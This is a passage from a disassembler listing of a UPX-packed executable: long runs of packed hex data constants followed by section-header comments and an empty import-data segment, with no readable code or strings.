dd 57F266AFh, 62C62D1Eh, 0C745452Fh, 0FACC28D6h, 7F57651Dh
dd 38751D4Eh, 0F7E83258h, 2A8E951Ch, 0AF8D4577h, 0B29C923Eh
dd 0E718EDFEh, 0F314A0B6h, 8F8F2B22h, 9B34FEC4h, 25C8396Ah
dd 40F80AF1h, 57FFB122h, 6138EC89h, 40F8295Fh, 434DBB1Bh
dd 0E9E52ED2h, 0AC9DF7h, 77B13BDFh, 5D522686h, 9C83E1C2h
dd 6BDCE282h, 9E1BE1B9h, 0E31141FAh, 0E650EBB2h, 1BC5F363h
dd 1735182Ah, 5604757Bh, 8B33B07Ah, 4B7CB153h, 700E6EA3h
dd 8C032596h, 0AF81A491h, 6C68371Fh, 0A0522E45h, 40771586h
dd 0EFE04662h, 0A75FCD43h, 6798CD4Bh, 205D3E05h, 0DFD07A9Ch
dd 39DAE7Fh, 577BB905h, 3331A4D6h, 4C00F177h, 95B86CDEh
dd 0C078A9DEh, 0C3CD579Bh, 0F4986452h, 862C5DA7h, 0B4737191h
dd 73E4C917h, 9FE01142h, 681B53F3h, 271879A7h, 0A49317C5h
dd 803BF2C5h, 0F482C2E7h, 429079EAh, 0DE84B50Ah, 0CBFED69h
dd 0CBBC1D3Bh, 48379BC9h, 0E4BF9669h, 881A669Bh, 0C22B1D8Eh
dd 6022A4FDh, 86E98AA5h, 0B20BE0FAh, 74AC1052h, 0EA300A61h
dd 0FA6A06E6h, 28622A05h, 754BEAE2h, 0B7163A76h, 9E18B01Dh
dd 117FC520h, 0D3786A2Eh, 0AAA18055h, 2DB19057h, 827061ABh
dd 6BC89185h, 395BD939h, 0F324550Eh, 0CA931C01h, 31114AF5h
dd 4BD84972h, 2C2394EDh, 7131BD1Eh, 2A0289F0h, 31A8E528h
dd 37908172h, 346C5FBEh, 0F329AD0Ah, 882F32F9h, 0AC6A23h
dd 4275592h, 3B3A601Dh, 0DE775E15h, 0B66B4411h, 25D9A89Fh
dd 9D88CFDh, 4CDBA875h, 6901C8E9h, 0A617C57Dh, 0CA810CD9h
dd 4E568C29h, 0AD705AAh, 82502E3Dh, 873FAC72h, 6E3B08DFh
dd 681CB0E5h, 0B6D3A06Ch, 0D29E6512h, 8F966C05h, 73A4D5F8h
dd 360340AAh, 0EB1CA569h, 0A8FD89BAh, 23B73F13h, 0A2F5EA32h
dd 32683D6Eh, 89950498h, 2F84F5EFh, 10DAD3ABh, 0D2D26A88h
dd 7378F1Fh, 372620D6h, 0A3F11h, 0C2A9CD35h, 0F7274F0Fh
dd 41A3CCC6h, 6FA0B102h, 0AEE59239h, 2A62497Ah, 0E9DB8762h
dd 230CD0D2h, 0FECCFD2Ch, 0D891BA76h, 1A4475A7h, 4F7EDF64h
dd 2101C51Eh, 49EB8855h, 3346735h, 42806B59h, 7B64D944h
dd 88E81A4Ah, 0EACA735Eh
dd 6ED811Dh, 0BC9C8D32h, 9765195Ah, 8D14054Ah, 47897F92h
dd 8774B196h, 144B18D0h, 15703494h, 7C319351h, 4B3CC10Fh
dd 85104E01h, 1CF42556h, 0FF30673Ah, 0C7D445CEh, 0F1AB7830h
dd 0F3B0EECBh, 0C99CD782h, 2B9CA1D7h, 53B14E82h, 0C3B205F6h
dd 0EB41C605h, 1B547D6Eh, 5095B9EAh, 0BFAB62A6h, 5B0131A2h
dd 0DCB944E3h, 4A78690Eh, 0AFB5E516h, 0D895A149h, 0F82C1D82h
dd 0DCE8E97Eh, 73E4C91Ch, 2F3B4547h, 0AB08682Bh, 0AD248EBAh
dd 4FA54A09h, 9FD00172h, 0E478BD6Eh, 4321D62Ah, 4282B5A6h
dd 0E51D74ABh, 0CBFC6D87h, 2E04F882h, 0F8B47D61h, 9C88602Dh
dd 46EC1D4Ch, 0B7F16F27h, 2716ADC6h, 0EB93905Dh, 0ABDC0F35h
dd 0D0E6DE01h, 0F9DB8576h, 37D2C4CEh, 0F2BF8A79h, 0D895BB75h
dd 0DDC575A6h, 4F805106h, 0BDEE687Eh, 0D33E2CACh, 0B224CF95h
dd 0FF9CD257h, 7BACDD0Eh, 2CDA2E5Ah, 33F0411Bh, 44D51CC2h
dd 7E9C8D0Eh, 9E6140DEh, 6814456Fh, 5F608107h, 0EC2950EEh
dd 8AC61C2Ah, 481EC0Ah, 0F4031B6h, 528CADDEh, 87B8919Eh
dd 0ABC31456h, 462150BAh, 0D9F91879h, 0F4A81903h, 456014F4h
dd 6A205182h, 0EB555F73h, 774E54FAh, 43F0BFB7h, 0FA704172h
dd 1DBB7564h, 0C98702D9h, 7849E01Ah, 4A00F152h, 4B4CCA1Bh
dd 0C2A27BDAh, 0E03309E2h, 0BF3031FFh, 60C7E08Eh, 376899CAh
dd 74AC7F7Dh, 3EDF1908h, 68A3A401h, 2718A23Ch, 4FA54A09h
dd 9F900172h, 0DD783D6Eh, 8947715Dh, 0DC548EE2h, 4FA95FB7h
dd 0B3ABA85Eh, 8403799Bh, 4334D9A7h, 7FB0E1D2h, 0B3571F82h
dd 5B74015Bh, 1E9DC491h, 474FD40Eh, 5CE0DF55h, 2EB41C4Ch
dd 17E1025Fh, 329001C6h, 0A21E2C92h, 567DAB5Bh, 134476D4h
dd 1B5346F8h, 8969EDDEh, 95405BC3h, 53BC776Ah, 662409EDh
dd 682ECB9h, 71E72510h, 24A18C76h, 2F60D1D6h, 0F0ACCDFEh
dd 0BAA50FFBh, 0DCB6C2EFh, 9C4F81F2h, 5BCCAD8Bh, 97DD60A9h
dd 0FE043566h, 5CE359E1h, 4B3CB6C8h, 87E670A3h, 1772556h
dd 10ADD872h, 3B6C5DC2h, 6328D90Ah, 0D28CE749h, 194310DBh
dd 4BE0A35h, 6AF7C9BAh, 2EFCC0AFh, 5C8751B8h, 1B8C4660h
dd 0CA8083E3h, 9B8A6E25h, 5210F363h, 963C957Dh, 781835Fh
dd 5FC83D16h, 81F12152h, 3E2D0686h, 4ED5239Ah, 62A4951Ah
dd 0EFCC02C7h, 0EB1C4D7Eh, 2A52DDCAh, 2384A273h, 6ED0B732h
dd 9B380EF3h, 194879AAh, 0C970EAE6h, 603D28E4h, 0CBFC6D92h
dd 0B4386D9Ah, 33011FD8h, 0CEB0A1E6h, 0FB18EED3h, 0F7E8598Ah
dd 0BD6B4AC6h, 0C9DED305h, 0BA7A433Ch, 0E68E52E1h, 25FAC784h
dd 72FBA3A4h, 0BD53217Ch, 1F06C88Eh, 4CEEE225h, 4680B122h
dd 22F365A2h, 79858855h, 0BA34A55Fh, 0FF9DE547h, 0E159EC0Eh
dd 1EE85943h, 33F141FBh, 59D51EC2h, 0F09C8D27h, 0E7E16BCFh
dd 8D421676h, 4DFD80B2h, 0B28CFDD7h, 0D79551BFh, 0A151E466h
dd 164031BBh, 8B69B973h, 3D45761Ah, 7AF4651Eh, 0BF5933E7h
dd 0A8DF53CEh, 7768AE7Eh, 0EC0E7AC5h, 0B2205142h, 2B5C8D96h
dd 686E06FAh, 961D62B7h, 0AFD841B2h, 9BC93EA9h, 0D48879FFh
dd 0DB43B866h, 10F3613Dh, 4B49ED23h, 577DECDAh, 0B0B4FF16h
dd 8371074Eh, 4C105972h, 8F088C7Fh, 6A3704CAh, 0B5F81617h
dd 13CF9C65h, 0CE9B6808h, 4867E397h, 91FC574Ah, 0DB0C22D6h
dd 0B4E019AAh, 40976431h, 6BFC7C3Bh, 1169AA8Eh, 823829D2h
dd 0C44E9D06h, 52AEE7E8h, 0BBD4D333h, 7228F88Ah, 85642F8Ah
dd 0F72D90B2h, 2EDCCD73h, 0CD9951BEh, 0F767B462h, 1D0FC407h
dd 0F6F39532h, 3EA05825h, 0F45724F1h, 4FAC29A1h, 0DCE3ED1Eh
dd 0C7F85812h, 3243D96h, 5F2EA1D2h, 7BDC250Eh, 0BA00194Ah
dd 0B5245586h, 5BD591E6h, 5161C922h, 0CBD8E1B9h, 0E3FC255Fh
dd 9A5081B2h, 10BCA1C2h, 6C49F3B1h, 0D3C42955h, 16DD6A8Ah
dd 47BA0E49h, 89B2EC1Ah, 73EF2A57h, 0E754817Dh, 0BB3B2435h
dd 0BB2B2939h, 2F561528h, 0EC853130h, 373642D9h, 6CA013C3h
dd 417ECA4Ch, 57CF17C6h, 0A2392757h, 0A802DA0Bh, 4F06A20Fh
dd 865251D0h, 6680401Dh, 1BDF1C89h, 8B2B65D1h, 4CDB21E5h
dd 76B6744Fh, 698EB569h, 75AEF8C4h, 0EC825131h, 535ECA4Ch
dd 0C797877h, 7E7D5364h, 0E43AC7Fh, 88AA9F0h, 918EADF4h
dd 1Ah, 58h dup(0)
dd 1280h dup(?)
UPX2 ends
; Section 4. (virtual address 0001F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001A600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3143F000h
align 2000h
_idata2 ends
end start